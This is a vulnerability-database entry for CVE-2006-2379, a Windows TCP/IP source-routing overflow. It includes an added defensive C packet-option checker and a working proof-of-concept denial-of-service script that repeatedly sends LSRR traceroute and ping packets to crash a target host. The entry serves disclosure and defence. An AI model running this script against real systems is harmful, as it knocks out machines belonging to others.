Microsoft Windows TCP/IP Protocol Driver Remote Overflow Vulnerability

Vulnerability ID: 1110538    Vulnerability type: Buffer error
Published: 2006-06-30    Updated: 2006-07-04
CVE number: CVE-2006-2379    CNNVD-ID: CNNVD-200606-283
Vulnerability platform: Windows    CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/1967
https://www.securityfocus.com/bid/18374
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-283
|Vulnerability details
Microsoft Windows is a family of operating systems released by the US company Microsoft. The Microsoft Windows TCP/IP protocol driver contains a buffer overflow vulnerability in its handling of certain malformed IP source-routed packets. A remote attacker can trigger it by sending a specially crafted ICMP packet carrying the Loose Source and Record Route option, causing a fault in tcpip.sys or ntoskrnl.exe that results in a denial of service or execution of arbitrary instructions. By default, the Routing and Remote Access service is disabled on Windows systems, so a default configuration is not affected by this vulnerability.
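As an added example (not part of the CNNVD record or of the PoC below), the following C program shows the defender's side of the description above: a bounds-checked walk of the IPv4 options area that flags packets carrying the LSRR or SSRR option and rejects option encodings whose length or pointer fields disagree with the header, which is the kind of input a packet filter or IDS in front of a routing host would want to drop or alert on. The option type codes are those defined in RFC 791; the three sample packets are constructed for this example (ICMP echo requests with checksums left at zero).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* IPv4 option type codes from RFC 791 (copy flag + class + number). */
#define IPOPT_EOL   0    /* end of option list */
#define IPOPT_NOP   1    /* no operation */
#define IPOPT_RR    7    /* record route */
#define IPOPT_LSRR  131  /* loose source and record route */
#define IPOPT_SSRR  137  /* strict source and record route */

enum verdict { PKT_CLEAN = 0, PKT_SOURCE_ROUTED = 1, PKT_MALFORMED = 2 };

/* Walk the options area of one IPv4 packet. Returns PKT_MALFORMED when the
 * header or an option's length/pointer fields are inconsistent with the
 * bytes actually present, PKT_SOURCE_ROUTED when a well-formed LSRR or SSRR
 * option is present, and PKT_CLEAN otherwise. */
enum verdict inspect_ipv4(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return PKT_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;  /* header length in bytes */
    if (ihl < 20 || ihl > len)
        return PKT_MALFORMED;

    enum verdict v = PKT_CLEAN;
    size_t off = 20;                            /* options follow the fixed header */
    while (off < ihl) {
        uint8_t type = pkt[off];
        if (type == IPOPT_EOL)
            break;
        if (type == IPOPT_NOP) {
            off++;
            continue;
        }
        /* Every other option is TLV: type, length (covering both bytes and data). */
        if (off + 1 >= ihl)
            return PKT_MALFORMED;
        uint8_t olen = pkt[off + 1];
        if (olen < 2 || off + olen > ihl)
            return PKT_MALFORMED;               /* length claims bytes the header lacks */
        if (type == IPOPT_LSRR || type == IPOPT_SSRR || type == IPOPT_RR) {
            /* Route options carry a pointer byte followed by 4-byte addresses. */
            if (olen < 3 || (olen - 3) % 4 != 0)
                return PKT_MALFORMED;
            uint8_t ptr = pkt[off + 2];
            if (ptr < 4 || (ptr - 4) % 4 != 0)
                return PKT_MALFORMED;           /* pointer must index an address slot */
            if (type != IPOPT_RR)
                v = PKT_SOURCE_ROUTED;
        }
        off += olen;
    }
    return v;
}

/* Constructed sample packets: plain echo request, IHL = 5, no options. */
const uint8_t pkt_plain[] = {
    0x45, 0x00, 0x00, 0x1c, 0x00, 0x01, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00,
    10, 0, 0, 1, 10, 0, 0, 2,
    0x08, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01
};

/* Echo request with a well-formed one-hop LSRR option plus EOL padding, IHL = 7. */
const uint8_t pkt_lsrr[] = {
    0x47, 0x00, 0x00, 0x24, 0x00, 0x02, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00,
    10, 0, 0, 1, 10, 0, 0, 2,
    0x83, 0x07, 0x04, 192, 0, 2, 1, 0x00,
    0x08, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01
};

/* Same layout, but the LSRR length byte claims 12 bytes in an 8-byte options area. */
const uint8_t pkt_bad_len[] = {
    0x47, 0x00, 0x00, 0x24, 0x00, 0x03, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00,
    10, 0, 0, 1, 10, 0, 0, 2,
    0x83, 0x0c, 0x04, 192, 0, 2, 1, 0x00,
    0x08, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01
};

int main(void)
{
    printf("plain:   %d\n", inspect_ipv4(pkt_plain, sizeof pkt_plain));
    printf("lsrr:    %d\n", inspect_ipv4(pkt_lsrr, sizeof pkt_lsrr));
    printf("bad len: %d\n", inspect_ipv4(pkt_bad_len, sizeof pkt_bad_len));
    return 0;
}
```

The length check against the IHL is the point: the advisory's trigger is a source-route option whose encoding the driver trusted, so a filter that refuses any option claiming more bytes than the header holds, and any pointer that does not land on an address slot, rejects the malformed class before it reaches the stack, while still letting an operator decide separately whether well-formed source-routed packets should be forwarded at all.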
|Exploit
/*

####################################
# 
# Windows TCP/IP source routing poc
# C version...
#
# by Preddy
#
# RootShell Security Group
#
# Shoutz 2: 
#
#  Jimmy and ByteCoder + 
#  Rs Crew + 
#  Rest of the world :D
#
#
####################################

Compile:

gcc win-tcpip-dos.c -o wintcpipdos

Info:

Published:     14.06.2006
Source:        ANDREYMINAEV
Type:          remote
Level:         9/10

Buffer overflow on ICMP packets with 
Loose Source and Record Route IP options. 
Short message translation: There are DoS 
conditions in Windows 2000 built-in NAT 
server. Tested configuration: Windows 2000 
English Standard/Advanced Service Pack 4 
+ Update Rollup 1 for Service Pack 4 with 
NAT server enabled. While routing packets 
with options "Loose Source and Record Route" 
defined by RFC 791 through server, Windows 
crashes to BSOD with error in tcpip.sys or 
ntoskrnl.exe, or system hangs or system 
began unstable work. It doesn't matter if 
packets are from internal or external 
networks. Use attached script to test 
vulnerability. On Windows 2003 problem 
doesn't present. It's also likely same 
problem to present in Windows 2000 + 
ISA 2000. Code execution is potentially possible.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    /* target address and the name of the local OS ("linux" or "windows") */
    char dos_ip[256];
    char mysystem[32];
    /* command lines handed to system(): utility, its flags, the target */
    char ping[64];
    char trace[128];

    if(argc != 3)
    {
        printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n");
        printf("Usage: %s <ip> <mysystem>\n", argv[0]);
        printf("Example: %s 127.0.0.1 linux\n", argv[0]);
        printf("Uses the ping and the traceroute utility on your system\n");
        printf("Should cause a BSOD on the remote system\n");
        printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n");
        exit(1);
    }

    /* bounded copies; the original strcpy() into a 10-byte buffer could overflow */
    snprintf(dos_ip, sizeof dos_ip, "%s", argv[1]);
    snprintf(mysystem, sizeof mysystem, "%s", argv[2]);

    if(strcmp(mysystem, "linux") == 0)
    {
        printf("\nTarget: %s\n", dos_ip);
        printf("MySystem: %s\n", mysystem);
        printf("Sending Payload...\n\n");

        /* one echo request, and a one-hop traceroute with a loose source
           route gateway (-g) so the probe carries the LSRR IP option */
        snprintf(ping, sizeof ping, "ping -c 1 %s", dos_ip);
        snprintf(trace, sizeof trace, "traceroute -m 1 -g 0.0.0.0 %s", dos_ip);

        while(1)
        {
            system(trace);
            system(ping);
        }
    }

    if(strcmp(mysystem, "windows") == 0)
    {
        printf("Target: %s\n", dos_ip);
        printf("MySystem: %s\n", mysystem);
        printf("Sending Payload...\n");

        /* Windows equivalents: ping -n (count) and tracert -j (loose source route) */
        snprintf(ping, sizeof ping, "ping -n 1 %s", dos_ip);
        snprintf(trace, sizeof trace, "tracert -h 1 -j 0.0.0.0 %s", dos_ip);

        while(1)
        {
            system(trace);
            system(ping);
        }
    }

    return 0;
}

// milw0rm.com [2006-06-30]
|Affected products
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Wind
|References

Source: US-CERT
Name: VU#722753
Link: http://www.kb.cert.org/vuls/id/722753
Source: US-CERT
Name: TA06-164A
Link: http://www.us-cert.gov/cas/techalerts/TA06-164A.html
Source: BID
Name: 18374
Link: http://www.securityfocus.com/bid/18374
Source: VUPEN
Name: ADV-2006-2329
Link: http://www.frsirt.com/english/advisories/2006/2329
Source: SECUNIA
Name: 20639
Link: http://secunia.com/advisories/20639
Source: BUGTRAQ
Name: 20060628 Re[2]: Is Windows TCP/IP source routing PoC code available?
Link: http://www.securityfocus.com/archive/1/archive/1/438609/100/0/threaded
Source: BUGTRAQ
Name: 20060627 Re: Is Windows TCP/IP source routing PoC code available?
Link: http://www.securityfocus.com/archive/1/archive/1/438482/100/0/threaded
Source: MS
Name: MS06-032
Link: http://www.microsoft.com/technet/security/bulletin/ms06-032.mspx
Source: FULLDISC
Name: 20060625 Is Windows TCP/IP source routing PoC code available?
Link: http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/46702
Source: SECTRACK
Name: 1016290
Link: http://securitytracker.com/id?1016290
Source: XF
Name: win-tcp-ip-driver-bo(26834)
Link: http://xforce.iss.net/xforce/xfdb